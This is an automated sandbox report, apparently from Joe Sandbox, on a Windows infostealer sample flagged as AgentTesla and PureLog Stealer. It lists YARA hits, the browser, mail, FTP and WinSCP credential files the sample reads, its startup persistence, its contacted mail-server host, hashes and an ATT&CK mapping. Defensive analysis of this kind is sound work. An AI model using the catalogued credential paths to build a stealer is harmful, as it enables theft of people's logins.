Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: juvenile.exe	Binary or memory string: WIN_81
Source: juvenile.exe	Binary or memory string: WIN_XP
Source: juvenile.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: juvenile.exe	Binary or memory string: WIN_XPe
Source: juvenile.exe	Binary or memory string: WIN_VISTA
Source: juvenile.exe	Binary or memory string: WIN_7
Source: juvenile.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3396205301.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2335172794.000000000301A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5676, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2335172794.0000000003045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3396205301.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2335172794.000000000301A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3396205301.0000000003335000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5676, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_006D8C4F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_006D923B
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_00DC8C4F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00DC923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	121 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	12 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Software Packing	NTDS	148 System Information Discovery	Distributed Component Object Model	121 Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\cyclop\juvenile.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.privateemail.com	198.54.122.135	true	false		high
api.ipify.org	172.67.74.152	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.ipify.org/	RegSvcs.exe, 0000000B.00000002.3395099614.000000000149C000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.ipify.org	RegSvcs.exe, 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2335172794.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3396205301.00000000032E0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.ipify.org/f	RegSvcs.exe, 00000005.00000002.2333247848.0000000001179000.00000004.00000020.00020000.00000000.sdmp	false	high
https://account.dyn.com/	RegSvcs.exe, 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp	false	high
http://mail.privateemail.com	RegSvcs.exe, 00000005.00000002.2335172794.000000000304B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3396205301.000000000333B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000005.00000002.2335172794.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3396205301.00000000032E0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.ipify.org/7	RegSvcs.exe, 00000005.00000002.2333247848.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.54.122.135	mail.privateemail.com	United States		22612	NAMECHEAP-NETUS	false
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1558663
Start date and time:	2024-11-19 17:14:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@18/8@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 62 Number of non-executed functions: 294
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Simulations

Behavior and APIs

Time	Type	Description
11:15:34	API Interceptor	193x Sleep call for process: RegSvcs.exe modified
17:15:22	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.54.122.135	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	kNyZqDECXJ.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	ItPTgiBC07.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	q6utlq83i0.exe	Get hash	malicious	Unknown	Browse
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DO9uvdGMde.exe	Get hash	malicious	AgentTesla	Browse
	4dALKsHYFM.exe	Get hash	malicious	AgentTesla, AsyncRAT, PureLog Stealer, zgRAT	Browse
	SecuriteInfo.com.W32.MSIL_Kryptik.KUK.gen.Eldorado.13479.2252.exe	Get hash	malicious	AgentTesla	Browse
172.67.74.152	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.privateemail.com	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	kNyZqDECXJ.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	ItPTgiBC07.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	q6utlq83i0.exe	Get hash	malicious	Unknown	Browse	198.54.122.135
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	DO9uvdGMde.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	4dALKsHYFM.exe	Get hash	malicious	AgentTesla, AsyncRAT, PureLog Stealer, zgRAT	Browse	198.54.122.135
	SecuriteInfo.com.W32.MSIL_Kryptik.KUK.gen.Eldorado.13479.2252.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
api.ipify.org	Quotation.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DOCS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	1Sj5F6P4nv.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	5LEXIucyEP.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	44qLDKzsfO.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	gP5rh6fa0S.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	spacers.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	urkOkB0BdX.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	8F0oMWUhg7.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	QnwvXkF691.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	7NiXU5TCee.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	r7F41la3x6.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	htslUYNLWN.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	QnwvXkF691.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	7NiXU5TCee.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	r7F41la3x6.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	htslUYNLWN.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	https://tipicopisco.com/go/bebek.txt	Get hash	malicious	Unknown	Browse	185.61.154.26
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	162.213.249.216
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.81.208
	https://go.smarticket.co.il/ls/click?upn=u001.fgiCeFBep9-2Bp-2BI-2FBS-2FQzpC2xjyJy-2F3Vyk7Il68bLLvPtf3ylvqCBA6C4EKNjzvjnO7DmxwgRAXuVTKqXeWWK-2FRyQMKjq9z-2BeZ1OwQD7V12gscv6zX7-2Fcxb55J0EV8f1Ampt81io8dhDiURp87hwByg-3D-3DPZ85_0T32ClFdYnPySZLQz4syRr7AwaED9TGwCQfdVJE24C8qx-2FghFyENLTwUUG0FX6F78aPynA7LKVT6R5ntoQlQZb9fRs8iNVA2HWvcmmoeVoX5U4BkQXE1rGek-2BllU6xjoddV3OqcFS-2BzUe7QEf-2FVzWmQq7Hr-2FUf1AtbONCJrBpjucqxB4DYLng3LY-2BDrUntPLxYfeHfTgJA-2BRFnv1g1-2FOyg-3D-3D	Get hash	malicious	Unknown	Browse	172.67.24.131
	Toolly.exe	Get hash	malicious	Unknown	Browse	172.67.204.34
	file.exe	Get hash	malicious	Amadey, Cryptbot, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	HnKaJYxoTj.hta	Get hash	malicious	Unknown	Browse	188.114.96.3
	test2.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	172.67.152.34
	test.exe	Get hash	malicious	CobaltStrike	Browse	172.67.152.34
	beacon_x64.exe	Get hash	malicious	CobaltStrike	Browse	104.21.64.152
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3

Process:	C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe
File Type:	data
Category:	dropped
Size (bytes):	267276
Entropy (8bit):	7.977089330325887
Encrypted:	false
SSDEEP:	6144:ZuGk22/iYQpcjvYeqisYf90vDBAMl6tNwrsTh4ksOm1o:0J22/nQajwOsY2vFV6asacP
MD5:	4566379D6341E7F75730F7A237587F0B
SHA1:	6C5279E99869DFE7BA38513457B58258FAE4BFBA
SHA-256:	F001C88DC939A1ACD8E8BB23AB215E5DEEF4BF963A8729FE5C3DD79E05E447B0
SHA-512:	B382E72928626BB5F7AEA2C1D59C54ECD3AB65BB091DBD75B0C0894E57569168EB2E4F97AF48B7361DCD6BACD506E1F792964FB35B60E6D3D3E6BD146E9886DE
Malicious:	false
Reputation:	low
Preview:	EA06......yS....O.L)..n..2.S.....0....`.B.X........\|]`.B.]..f.J...._.....@.P$..t..].J.si.vYn.M"..}z.+...W...7....9.n$....d.Jw..../.P...5.m1..tSz..L...[.t"g..."ri.8...[k....E2.......mZ.<@(>>...7..`.zM>.1.Rd....#[J...=..i5..ReX.M..+.<.......B.v..`....O..(f.....6.6.R):..^eZ.M.3i.aT..<5.MJ..1.0.g\|.....x....F....d.5I.......~..]>..)..na...}..d.,..%.J...5..MJ..Q....M.U1..%.j....(\|.(.......\|...&.<.Q. .....(X.t......U..><M.U&.N...W.......`....Q.B@.>..O........s.E;....+._..m..M.5ZM?.Z..u...3N.g._...1...._.&.[M....<."s....T...aO....>n.b.Q..:.K.\|!?:..!....3.,..[.bi....R.K&....]..F..+........We!...nf.......y...Q.\9..v.Q1........9.Niu.vVc...j3m..o...v..\|#...u........(7..VvRKT.......>$.... 